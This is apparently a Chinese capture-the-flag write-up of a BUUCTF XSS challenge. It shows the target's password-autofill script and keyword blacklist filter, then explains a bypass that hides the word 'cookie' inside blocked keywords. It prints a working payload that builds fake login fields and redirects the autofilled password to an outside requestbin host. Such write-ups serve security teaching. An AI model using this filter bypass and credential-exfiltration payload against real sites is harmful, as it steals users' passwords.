if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split('; ');
var cookie = {};
for (var i = 0; i < cookies.length; i++) {
var arr = cookies[i].split('=');
var key = arr[0];
cookie[key] = arr[1];
}
if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
document.getElementsByName("username")[0].value = cookie['user'];
document.getElementsByName("password")[0].value = cookie['psw'];
}
}注册进入Feedback.PHP发现反馈界面,输入内容list.PHP便有显示
看到Feedback.PHP界面是个反馈界面,可以大致猜测该题为xss。传入反馈信息,等待后端bot查看,返回数据。
if(is_array($Feedback)){
echo "<script>alert('反馈不合法');</script>";
return false;
}
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
while(true){
if(stripos($Feedback,$val) !== false){
$Feedback = str_ireplace($val,"",$Feedback);
}else{
break;
}
}
}可以看到黑名单中只要出现cookie前面的内容,都会被过滤掉。所以这里就用添加cookie的方式要过绕过。
提交如下代码,构造登陆框。
<incookieput type="text" name="username" />
<incookieput type="password" name="password" />
<sccookieript scookierc="./js/login.js"></sccookieript>
<sccookieript>
psw = docookiecument.gecookietElementsByName("password")[0].value;
docookiecument.locookiecation = "http://http.requestbin.buuoj.cn/z18ihzz1/psw=" + psw;
</sccookieript>等待bot点开,收flag就好了。
提示:该做题环境位于buuctf,此环境不能访问外网。所以要用内网提供的环境来收flag
